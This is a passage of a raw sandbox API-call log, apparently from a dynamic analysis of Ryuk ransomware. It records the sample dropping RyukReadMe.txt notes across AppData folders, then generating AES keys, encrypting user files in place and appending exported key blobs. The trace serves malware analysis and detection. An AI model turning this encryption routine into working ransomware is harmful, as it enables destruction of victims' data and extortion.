"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0148.590] GetLastError () returned 0xb7 [0148.590] CloseHandle (hObject=0x190) returned 1 [0148.590] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0148.590] SetLastError (dwErrCode=0x0) [0148.590] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0148.590] GetLastError () returned 0xb7 [0148.590] CloseHandle (hObject=0x190) returned 1 [0148.590] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0148.591] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0148.591] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0148.591] SetLastError (dwErrCode=0x0) [0148.591] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\flash player\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0148.591] GetLastError () returned 0x0 [0148.591] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0148.592] CloseHandle (hObject=0x194) returned 1 [0148.592] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0148.593] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0148.593] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0148.593] SetLastError (dwErrCode=0x0) [0148.593] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\flash player\\assetcache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0148.593] GetLastError () returned 0x0 [0148.593] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0148.594] CloseHandle (hObject=0x198) returned 1 [0148.594] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0148.595] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0148.595] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0148.595] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0148.595] SetLastError (dwErrCode=0x0) [0148.595] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\flash player\\assetcache\\d5ntrc6r\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0148.595] GetLastError () returned 0x0 [0148.595] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0148.596] CloseHandle (hObject=0x198) returned 1 [0148.596] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0148.596] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0148.596] SetLastError (dwErrCode=0x0) [0148.596] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\flash player\\assetcache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0148.597] GetLastError () returned 0xb7 [0148.597] CloseHandle (hObject=0x194) returned 1 [0148.597] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0148.597] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0148.597] SetLastError (dwErrCode=0x0) [0148.597] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Flash Player\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\flash player\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0148.597] GetLastError () returned 0xb7 [0148.597] CloseHandle (hObject=0x190) returned 1 [0148.597] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0148.597] SetLastError (dwErrCode=0x0) [0148.597] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0148.597] GetLastError () returned 0xb7 [0148.597] CloseHandle (hObject=0x190) returned 1 [0148.597] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0148.597] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0148.597] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0148.597] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0148.598] SetLastError (dwErrCode=0x0) [0148.598] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Headlights\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\headlights\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0148.598] GetLastError () returned 0x0 [0148.598] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0148.599] CloseHandle (hObject=0x190) returned 1 [0148.599] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0148.599] SetLastError (dwErrCode=0x0) [0148.599] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0148.599] GetLastError () returned 0xb7 [0148.599] CloseHandle (hObject=0x190) returned 1 [0148.599] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0148.599] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0148.599] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0148.599] SetLastError (dwErrCode=0x0) [0148.599] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\linguistics\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0148.599] GetLastError () returned 0x0 [0148.599] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0148.600] CloseHandle (hObject=0x194) returned 1 [0148.601] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0148.601] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0148.601] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0148.601] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0148.601] SetLastError (dwErrCode=0x0) [0148.601] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\linguistics\\dictionaries\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0148.602] GetLastError () returned 0x0 [0148.602] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0148.602] CloseHandle (hObject=0x194) returned 1 [0148.603] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0148.603] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0148.603] SetLastError (dwErrCode=0x0) [0148.603] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\linguistics\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0148.603] GetLastError () returned 0xb7 [0148.603] CloseHandle (hObject=0x190) returned 1 [0148.603] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0148.603] SetLastError (dwErrCode=0x0) [0148.603] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0148.603] GetLastError () returned 0xb7 [0148.603] CloseHandle (hObject=0x190) returned 1 [0148.603] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0148.604] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0148.604] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0148.604] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0148.604] SetLastError (dwErrCode=0x0) [0148.604] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\logtransport2\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0148.604] GetLastError () returned 0x0 [0148.604] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0148.605] CloseHandle (hObject=0x190) returned 1 [0148.605] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0148.605] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0148.605] SetLastError (dwErrCode=0x0) [0148.605] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0148.605] GetLastError () returned 0xb7 [0148.605] CloseHandle (hObject=0x18c) returned 1 [0148.606] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0148.606] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0148.606] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIiHpI5fpVW.doc", dwFileAttributes=0x80) returned 1 [0148.606] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIiHpI5fpVW.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\aiihpi5fpvw.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0148.606] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=80670) returned 1 [0148.606] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=80670) returned 1 [0148.606] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x139fc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.606] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0148.607] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.607] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0148.607] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0148.607] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.607] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x13b1e, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x13b1e, lpOverlapped=0x0) returned 1 [0148.608] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0148.608] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x13b1e, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x13b20) returned 1 [0148.609] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.609] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x13b20, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x13b20, lpOverlapped=0x0) returned 1 [0148.609] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0148.609] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0148.609] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0148.609] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0148.609] CloseHandle (hObject=0x18c) returned 1 [0148.625] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.630] CryptDestroyKey (hKey=0x3b8690) returned 1 [0148.630] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.630] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0148.630] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0148.630] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AiRMw711Pkv_8Wnc7Nh.mp3", dwFileAttributes=0x80) returned 1 [0148.631] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AiRMw711Pkv_8Wnc7Nh.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\airmw711pkv_8wnc7nh.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0148.631] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=10589) returned 1 [0148.631] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=10589) returned 1 [0148.631] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x283b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.631] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0148.632] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.632] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0148.632] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0148.632] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.632] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x295d, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x295d, lpOverlapped=0x0) returned 1 [0148.632] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0148.632] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x295d, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x2960) returned 1 [0148.632] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.633] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x2960, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x2960, lpOverlapped=0x0) returned 1 [0148.633] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0148.633] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0148.633] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0148.633] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0148.633] CloseHandle (hObject=0x18c) returned 1 [0148.658] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.662] CryptDestroyKey (hKey=0x3b8690) returned 1 [0148.662] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.662] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0148.662] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0148.662] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dqVq5Fo2c6ixXkrop.mkv", dwFileAttributes=0x80) returned 1 [0148.663] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dqVq5Fo2c6ixXkrop.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\dqvq5fo2c6ixxkrop.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0148.663] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=51137) returned 1 [0148.663] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=51137) returned 1 [0148.663] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xc69f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.663] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0148.663] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.663] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0148.663] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0148.664] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.664] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, 